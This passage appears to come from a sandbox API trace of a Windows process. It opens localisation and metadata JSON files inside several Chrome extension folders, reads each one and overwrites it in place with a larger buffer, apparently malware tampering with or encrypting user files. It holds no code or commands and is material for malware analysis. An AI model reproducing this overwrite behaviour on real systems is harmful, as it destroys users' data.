| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.757] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e94d68, nNumberOfBytesToRead=0x9f, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e94d68*, lpNumberOfBytesRead=0x2fdf2bc*=0x9f, lpOverlapped=0x0) returned 1 [0170.759] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0170.759] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x627, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x627, lpOverlapped=0x0) returned 1 [0170.760] CloseHandle (hObject=0x1fc) returned 1 [0170.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0170.762] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.762] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb3 [0170.763] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.763] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.763] ReleaseMutex (hMutex=0x168) returned 1 [0170.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.763] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2fdf2bc*=0xb3, lpOverlapped=0x0) returned 1 [0170.765] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0170.765] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x63b, lpOverlapped=0x0) returned 1 [0170.765] CloseHandle (hObject=0x1fc) returned 1 [0170.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0170.767] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.767] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2769 [0170.767] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0170.767] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.768] ReleaseMutex (hMutex=0x168) returned 1 [0170.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0170.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f88ba4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0170.768] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0171.334] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1769 [0171.334] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0171.337] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1769 [0171.338] WriteFile (in: hFile=0x1fc, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0171.338] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0171.338] WriteFile (in: hFile=0x1fc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0171.338] CloseHandle (hObject=0x1fc) returned 1 [0171.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe5 [0171.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.340] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.340] ReleaseMutex (hMutex=0x168) returned 1 [0171.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.340] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea4ba8, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ba8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe5, lpOverlapped=0x0) returned 1 [0171.342] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.342] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x66d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x66d, lpOverlapped=0x0) returned 1 [0171.342] CloseHandle (hObject=0x1fc) returned 1 [0171.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.344] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.344] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe5 [0171.344] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.344] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.344] ReleaseMutex (hMutex=0x168) returned 1 [0171.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.344] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea4ba8, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ba8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe5, lpOverlapped=0x0) returned 1 [0171.346] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.346] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x66d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x66d, lpOverlapped=0x0) returned 1 [0171.346] CloseHandle (hObject=0x1fc) returned 1 [0171.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.348] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.348] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xd8 [0171.348] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.348] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.348] ReleaseMutex (hMutex=0x168) returned 1 [0171.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.349] ReadFile (in: hFile=0x1fc, lpBuffer=0x26c49b8, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c49b8*, lpNumberOfBytesRead=0x2fdf2bc*=0xd8, lpOverlapped=0x0) returned 1 [0171.350] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.350] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x660, lpOverlapped=0x0) returned 1 [0171.350] CloseHandle (hObject=0x1fc) returned 1 [0171.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.352] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.352] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xbf [0171.352] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.353] ReleaseMutex (hMutex=0x168) returned 1 [0171.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.353] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ee0438, nNumberOfBytesToRead=0xbf, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0438*, lpNumberOfBytesRead=0x2fdf2bc*=0xbf, lpOverlapped=0x0) returned 1 [0171.354] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.354] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x647, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x647, lpOverlapped=0x0) returned 1 [0171.355] CloseHandle (hObject=0x1fc) returned 1 [0171.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.356] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.356] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xec [0171.356] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.356] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.357] ReleaseMutex (hMutex=0x168) returned 1 [0171.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.357] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea4ba8, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ba8*, lpNumberOfBytesRead=0x2fdf2bc*=0xec, lpOverlapped=0x0) returned 1 [0171.358] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.358] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x674, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x674, lpOverlapped=0x0) returned 1 [0171.359] CloseHandle (hObject=0x1fc) returned 1 [0171.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.360] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.360] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x160 [0171.360] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.360] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.361] ReleaseMutex (hMutex=0x168) returned 1 [0171.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0171.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computed_hashes.json", lpUsedDefaultChar=0x0) returned 20 [0171.361] ReadFile (in: hFile=0x1fc, lpBuffer=0x26a93e8, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a93e8*, lpNumberOfBytesRead=0x2fdf2bc*=0x160, lpOverlapped=0x0) returned 1 [0171.362] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.362] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x6e8, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6e8, lpOverlapped=0x0) returned 1 [0171.363] CloseHandle (hObject=0x1fc) returned 1 [0171.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.365] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.365] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x84 [0171.365] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0171.365] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.366] ReleaseMutex (hMutex=0x168) returned 1 [0171.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.366] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f2f8b8, nNumberOfBytesToRead=0x84, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f2f8b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x84, lpOverlapped=0x0) returned 1 [0171.367] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0171.367] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x60c, lpOverlapped=0x0) returned 1 [0171.368] CloseHandle (hObject=0x1fc) returned 1 [0171.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" 